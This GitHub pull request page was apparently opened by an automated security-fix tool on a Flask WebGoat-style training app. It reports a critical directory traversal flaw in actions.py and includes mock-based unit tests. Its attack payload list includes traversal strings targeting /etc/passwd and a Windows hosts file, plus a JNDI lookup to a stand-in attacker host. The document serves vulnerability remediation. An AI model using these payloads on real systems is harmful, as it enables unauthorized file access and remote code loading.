Skip to content

AutoFix PR#16

Open
ongamse wants to merge 1 commit intomasterfrom
qwietai/autofix/fix0001
Open

AutoFix PR#16
ongamse wants to merge 1 commit intomasterfrom
qwietai/autofix/fix0001

Conversation

@ongamse
Copy link
Copy Markdown
Owner

@ongamse ongamse commented Feb 14, 2025
edited
Loading

Qwiet AI AutoFix

This PR was created automatically by the Qwiet AI AutoFix tool.
As long as it is open, subsequent scans and generated fixes to this same branch will be added to it as new commits.

Each commit fixes one vulnerability.

Some manual intervention might be required before merging this PR.

Project Information

Findings/Vulnerabilities Fixed

Finding 32: Directory Traversal: Attacker-controlled Data Used in File Path in actions.py

Commits/Files Changed
Details
Vulnerability Description

Attacker-Controlled input data is used as part of a file path to write a file without escaping or validation. This indicates a directory traversal vulnerability.

  • Severity: critical

  • CVSS Score: 9 (critical)

  • CWE: CWE-22: Directory Traversal

Attack Payloads 
[
1. {"filename": "../../../etc/passwd", "text": "attack_text"},
2. {"filename": "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", "text": "attack_text"},
3. {"filename": "./../../../../../../../../../../../../../etc/passwd", "text": "attack_text"},
4. {"filename": "~/../../../../../../../../../../etc/passwd", "text": "attack_text"},
5. {"filename": "${jndi:ldap://attacker-website/a}", "text": "attack_text"}
]
Testcases 
import unittest
from unittest.mock import patch, Mock
from flask_webgoat import actions

class TestActions(unittest.TestCase):

    @patch('flask_webgoat.actions.Path')
    def test_log_entry(self, mock_path):
        mock_path.return_value.open.return_value.__enter__.return_value.write = Mock()
        response = actions.log_entry()
        self.assertEqual(response.status_code, 200)
        self.assertTrue(mock_path.called)

    @patch('subprocess.run')
    def test_grep_processes(self, mock_run):
        mock_run.return_value.stdout = b'test_name'
        response = actions.grep_processes()
        self.assertEqual(response.status_code, 200)
        self.assertTrue(mock_run.called)

    @patch('pickle.loads')
    def test_deserialized_descr(self, mock_loads):
        mock_loads.return_value = 'test_description'
        response = actions.deserialized_descr()
        self.assertEqual(response.status_code, 200)
        self.assertTrue(mock_loads.called)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@ongamse